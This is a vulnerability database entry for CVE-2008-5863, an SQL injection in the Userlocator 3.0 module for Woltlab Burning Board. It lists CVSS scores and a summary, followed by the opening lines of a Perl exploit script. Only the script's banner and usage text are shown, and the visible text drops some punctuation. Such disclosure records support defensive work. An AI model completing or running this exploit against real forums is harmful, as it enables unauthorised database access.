7.5
CVSSv2

CVE-2008-5863

Published: 06/01/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in locator.php in the Userlocator module 3.0 for Woltlab Burning Board (wBB) allows remote malicious users to execute arbitrary SQL commands via the y parameter in a get_user action.

Vulnerable Product Search on Vulmon Subscribe to Product

v-gn userlocator 3.0

Exploits

#!/usr/bin/perl -w use strict; use LWP::Simple; $| = 1; p print q { ::::::::::::::::::::::::::::: :: Userlocator 30 Exploit :: :: written by katharsis :: ::::::::::::::::::::::::::::: [~] wwwkatharsisx2to [~] nebelfrost23@webde }; if (@ARGV < 2) { print "Usage: usrlocsploitpl [url] [user id]\nExample: usrlocsploitpl wwwtargetc ...